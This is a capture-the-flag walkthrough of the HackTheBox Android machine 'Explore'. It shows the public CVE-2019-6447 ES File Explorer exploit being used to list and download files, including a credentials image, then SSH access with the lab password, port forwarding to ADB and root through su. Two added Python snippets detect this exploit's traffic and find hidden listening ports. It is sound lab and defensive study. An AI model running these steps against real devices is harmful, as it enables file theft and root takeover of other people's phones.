# Explore

Explore is an easy-rated Android machine from [HackTheBox](https://app.hackthebox.com/machines/356) created by Bertolis. It was hard to find the exploit; I don't have previous experience attacking Android machines. You can use Metasploit on this machine, but there are still alternatives for exploiting the vulnerability. For privilege escalation, the only technique used is port forwarding. In this post, my IP is 10.10.14.52 and the target IP is 10.129.188.159.

### Gathering Information

First, we are going to start by checking if the machine is alive, then do the classic reconnaissance to get some general information about the target.

{% code title="Local Terminal" %}

```bash
ping -c 1 10.129.188.159


Pinging 10.129.188.159 with 32 bytes of data:
Reply from 10.129.188.159: bytes=32 time=152ms TTL=63
Reply from 10.129.188.159: bytes=32 time=162ms TTL=63
Reply from 10.129.188.159: bytes=32 time=161ms TTL=63
Reply from 10.129.188.159: bytes=32 time=168ms TTL=63

Ping statistics for 10.129.188.159:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 152ms, Maximum = 168ms, Average = 160ms
```

{% endcode %}

The machine is up. From the "Target Description" we know it is an Android device, but without that information we would assume at first glance that it is a Linux machine (TTL <= 64).

{% code title="Local Terminal" %}

```bash
nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.129.188.159 -oN PortScan

Nmap scan report for 10.129.188.159
Host is up, received user-set (0.16s latency).
Scanned at 2023-05-08 18:34:29 Pacific SA Standard Time for 14s
Not shown: 65530 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      REASON
2222/tcp  open  EtherNetIP-1 syn-ack ttl 63
42135/tcp open  unknown      syn-ack ttl 63
42239/tcp open  unknown      syn-ack ttl 63
59777/tcp open  unknown      syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 14.61 seconds
           Raw packets sent: 70480 (3.101MB) | Rcvd: 70426 (2.817MB)
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
nmap -sCV -p 2222,42135,42239,59777 10.129.188.159 -oN WebScan

Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-09 11:43 Pacific SA Standard Time
Nmap scan report for 10.129.188.159
Host is up (0.21s latency).

PORT      STATE SERVICE VERSION
2222/tcp  open  ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
42135/tcp open  http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: ES Name Response Server
42239/tcp open  unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:32 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest:
|     HTTP/1.1 412 Precondition Failed
|     Date: Tue, 09 May 2023 15:43:32 GMT
|     Content-Length: 0
|   HTTPOptions:
|     HTTP/1.0 501 Not Implemented
|     Date: Tue, 09 May 2023 15:43:37 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:54 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:37 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:54 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:55 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ??random1random2random3random4
|   TerminalServerCookie:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:54 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|_    Cookie: mstshash=nmap
59777/tcp open  http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
<...>
Service Info: Device: phone
```

{% endcode %}

That's a lot of information; we are going to explore every HTTP port first.

* Browser:   <http://10.129.188.159:2222>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FvbfFlT7wosavYab0cRS2%2Fimage.png?alt=media&#x26;token=9512a1ad-419b-4e7f-a76c-f919721e9c7c" alt=""><figcaption><p>Nothing</p></figcaption></figure>

* Browser:   <http://10.129.188.159:42135/>

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FvZbqOvmHScFyfbcudZ05%2Fimage.png?alt=media&#x26;token=12b89c6b-ebdd-4245-9ab0-1a1f1c9fd355" alt=""><figcaption><p>Nothing</p></figcaption></figure>

{% code title="Local Terminal" %}

```bash
whatweb http://10.129.188:159:2222
Prepare Target Failed - bad URI(is not URI?): "http://10.129.188:159:2222"

whatweb http://10.129.188:159:42135
Prepare Target Failed - bad URI(is not URI?): "http://10.129.188:159:42135"
```

{% endcode %}

From the basic gathering, besides the target being a phone (thanks to the second nmap scan), we don't have a lot of relevant information. Now we have to search for information about "Banana Studio" and "ES File Explorer" to learn about the target.

{% code title="Local Terminal" %}

```bash
searchsploit ES File Explorer
```

{% endcode %}

Output: "<https://www.exploit-db.com/exploits/50070>". We don't know if this version is vulnerable, but we don't lose anything by trying.

{% code title="Local Terminal" %}

```bash
batcat exploit.py

  13   │ if len(sys.argv) < 3: # Information about how to use
  14   │     print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
  15   │     sys.exit(1)
  
  21   │ if cmd not in cmds: # List of available commands 
  22   │     print("[-] WRONG COMMAND!")
  23   │     print("Available commands : ")
  24   │     print("  listFiles         : List all Files.")
  25   │     print("  listPics          : List all Pictures.")
  26   │     print("  listVideos        : List all videos.")
  27   │     print("  listAudios        : List all audios.")
  28   │     print("  listApps          : List Applications installed.")
  29   │     print("  listAppsSystem    : List System apps.")
  30   │     print("  listAppsPhone     : List Communication related apps.")
  31   │     print("  listAppsSdcard    : List apps on the SDCard.")
  32   │     print("  listAppsAll       : List all Application.")
  33   │     print("  getFile           : Download a file.")
  34   │     print("  getDeviceInfo     : Get device info.")
  35   │     sys.exit(1)
```

{% endcode %}

### Exploitation

All right, let's try if it works!

{% code title="Local Terminal" %}

```bash
python3 exploit.py listFiles 10.129.188.159

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : lib
time : 3/25/20 05:12:02 AM
type : folder
size : 12.00 KB (12,288 Bytes)

name : vndservice_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 65.00 Bytes (65 Bytes)

name : vendor_service_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 0.00 Bytes (0 Bytes)

name : vendor_seapp_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 0.00 Bytes (0 Bytes)

name : vendor_property_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 392.00 Bytes (392 Bytes)

<...>
```

{% endcode %}

It works! But there is nothing relevant here, so let's try another command.

{% code title="Local Terminal" %}

```bash
python3 exploit.py listPics 10.129.188.159

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg # Look what we found! This is interesting.
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)
```

{% endcode %}

Perfect, we found the path of a credentials-related file, and in 50070.py there is a command to download files.

{% code title="Local Terminal" %}

```bash
python3 exploit.py getFile 10.129.188.159 /storage/emulated/0/DCIM/creds.jpg

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...
[+] Done. Saved as `out.dat`.
```

{% endcode %}
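From the defender's side, the three requests above (two enumeration commands and one file download against port 59777) are easy to recognise on the wire. The following is an added example, not part of the original writeup or of 50070.py: a small classifier over constructed HTTP request records, assuming (as the public PoC does) that commands are sent as a JSON body with a `command` key and that downloads are plain GETs of the file path; the `HttpEvent` schema and the sample traffic are constructed for the example.

```python
import json
from dataclasses import dataclass

# Port of the ES File Explorer HTTP service (seen in the nmap and netstat output above).
ES_PORT = 59777

# Command names accepted by the service, taken from the usage text of 50070.py above.
ES_COMMANDS = {
    "listFiles", "listPics", "listVideos", "listAudios", "listApps",
    "listAppsSystem", "listAppsPhone", "listAppsSdcard", "listAppsAll",
    "getDeviceInfo",
}

@dataclass
class HttpEvent:  # one HTTP request as a sensor would record it (constructed schema)
    src: str
    dst_port: int
    method: str
    path: str
    body: str = ""

def classify(event):
    """Return an alert string if the request matches CVE-2019-6447 abuse, else None."""
    if event.dst_port != ES_PORT:
        return None
    if event.method == "POST":
        # The public PoC posts a JSON object with a "command" key; anything else is ignored.
        try:
            cmd = json.loads(event.body).get("command")
        except (ValueError, AttributeError):
            return None
        return f"{event.src}: device enumeration via ES command {cmd}" if cmd in ES_COMMANDS else None
    if event.method == "GET" and event.path not in ("", "/"):
        # getFile fetches the target path directly, e.g. /storage/emulated/0/DCIM/creds.jpg
        return f"{event.src}: file retrieval of {event.path}"
    return None

def scan(events):
    """Run classify() over a batch of events and return only the alerts, in order."""
    return [a for a in map(classify, events) if a is not None]

# Constructed sample traffic mirroring the three commands run in this writeup.
SAMPLE_EVENTS = [
    HttpEvent("10.10.14.52", 59777, "POST", "/", '{"command":"listFiles"}'),
    HttpEvent("10.10.14.52", 59777, "POST", "/", '{"command":"listPics"}'),
    HttpEvent("10.10.14.52", 59777, "GET", "/storage/emulated/0/DCIM/creds.jpg"),
    HttpEvent("10.10.14.52", 42135, "GET", "/"),           # ES name-response port, not flagged
    HttpEvent("10.10.14.52", 59777, "POST", "/", "HELP"),  # malformed body, not flagged
]
```

Running `scan(SAMPLE_EVENTS)` yields three alerts: two enumeration commands and the retrieval of creds.jpg; the other two records are ignored.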

{% code title="Local Terminal" %}

```bash
mv out.dat out.png
display out.png
```

{% endcode %}

<figure><img src="https://937334506-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNqjbvJ4m6enB6HiVWSTQ%2Fuploads%2FUQVQm6FruRKCSm2vtDDN%2Fimage.png?alt=media&#x26;token=24f43815-2d14-4a0f-9ea2-1eb6bc368e22" alt=""><figcaption></figcaption></figure>

A weird way to receive the password. Now we can try to connect through SSH with {kristi : Kr1sT!5h\@Rp3xPl0r3!}

{% code title="Local Terminal" %}

```bash
ssh kristi@10.129.188.159 -p 2222 
Unable to negotiate with 10.129.188.159 port 2222: no matching host key type found. Their offer: ssh-rsa
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa kristi@10.129.188.159 -p 2222

# pass: Kr1sT!5h@Rp3xPl0r3!
```

{% endcode %}

And we are in (the first attempt failed because recent OpenSSH clients no longer accept the ssh-rsa host key algorithm by default, hence the two -o options). Now it's time to find the user flag.

{% code title="Target Terminal \[u0\_a76]" %}

```bash
:/ $ whoami
u0_a76

:/ $ find -name user.txt 2>/dev/null
```

{% endcode %}

Nothing, which means the flag is on the SD card storage.

{% code title="Target Terminal \[u0\_a76]" %}

```bash
:/ $ cd sdcard
:/sdcard $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt
Android Download Music  Pictures      Ringtones dianxinos
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
```

{% endcode %}

### Privilege Escalation

After exploring the whole machine, the way to solve it was by using port forwarding.

{% code title="Target Terminal \[u0\_a76]" %}

```bash
netstat -nat
Active Internet connections (established and servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp6       0      0 :::59777                :::*                    LISTEN
tcp6       0      0 ::ffff:10.129.188:44485 :::*                    LISTEN
tcp6       0      0 ::ffff:127.0.0.1:44491  :::*                    LISTEN
tcp6       0      0 :::2222                 :::*                    LISTEN
tcp6       0      0 :::5555                 :::*                    LISTEN
tcp6       0      0 :::42135                :::*                    LISTEN
tcp6       0    208 ::ffff:10.129.188.:2222 ::ffff:10.10.14.50:6518 ESTABLISHED
```

{% endcode %}

If we compare with the nmap results, there is a new listening port, 5555. By default on Android devices this port is ADB (Android Debug Bridge), and since it is running we can try to use it. Open a new local terminal.
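The comparison just described can be done mechanically: take the listeners from `netstat -nat` on the device, subtract the ports the external nmap scan reported, and note how each leftover is bound. This is an added example, not part of the original writeup; the netstat text is a constructed excerpt in the format shown above and the port set is the one from the nmap scan.

```python
# Ports nmap reported open from the outside in the full port scan above.
NMAP_OPEN = {2222, 42135, 42239, 59777}

# Constructed excerpt in the format of the `netstat -nat` output shown above.
NETSTAT_OUTPUT = """\
Active Internet connections (established and servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp6       0      0 :::59777                :::*                    LISTEN
tcp6       0      0 ::ffff:10.129.188:44485 :::*                    LISTEN
tcp6       0      0 ::ffff:127.0.0.1:44491  :::*                    LISTEN
tcp6       0      0 :::2222                 :::*                    LISTEN
tcp6       0      0 :::5555                 :::*                    LISTEN
tcp6       0      0 :::42135                :::*                    LISTEN
tcp6       0    208 ::ffff:10.129.188.:2222 ::ffff:10.10.14.50:6518 ESTABLISHED
"""

LOOPBACK = {"127.0.0.1", "::1", "::ffff:127.0.0.1"}
WILDCARD = {"0.0.0.0", "::", "::ffff:0.0.0.0"}

def listening_ports(netstat_text):
    """Return {port: local_address} for every LISTEN line in netstat -nat output."""
    listeners = {}
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) >= 6 and fields[-1] == "LISTEN":
            addr, _, port = fields[3].rpartition(":")  # last colon separates address and port
            listeners[int(port)] = addr
    return listeners

def hidden_services(netstat_text, scanned_open):
    """Listeners the external scan did not report, with a note on why they were invisible."""
    report = {}
    for port, addr in listening_ports(netstat_text).items():
        if port in scanned_open:
            continue
        if addr in LOOPBACK:
            report[port] = "loopback only"
        elif addr in WILDCARD:
            # Bound on every interface yet unseen by the scan: something filters it externally.
            report[port] = "all interfaces, filtered externally"
        else:
            report[port] = f"bound to {addr}, not in scan"
    return report
```

For the listing above, `hidden_services(NETSTAT_OUTPUT, NMAP_OPEN)` reports 5555 as bound on all interfaces but filtered from the outside, which is exactly the case an SSH `-L` forward gets around.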

{% code title="Local Terminal" %}

```bash
ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa kristi@10.129.188.159 -p 2222 -L 5555:127.0.0.1:5555

# pass: Kr1sT!5h@Rp3xPl0r3!
```

{% endcode %}

After connecting, check from your side that the forwarded port 5555 is listening locally; open a new local terminal.

{% code title="Local Terminal II" %}

```bash
lsof -i:5555
```

{% endcode %}

If this shows the listener, you can use port 5555 as if it were local.

{% code title="Local Terminal II" %}

```bash
adb connect localhost:5555 # Another way to test if it is working
adb -s localhost:5555 shell # With this you will connect.
```

{% endcode %}

{% code title="Target Terminal \[u0\_a76]" %}

```bash
su
```

{% endcode %}

{% code title="Target Root" %}

```bash
:/ # whoami
root
:/ # find -name root.txt 2>/dev/null
./data/root.txt
1|:/ # cat ./data/root.txt
f04fc82b6d49b41c9b08982be59338c5
```

{% endcode %}
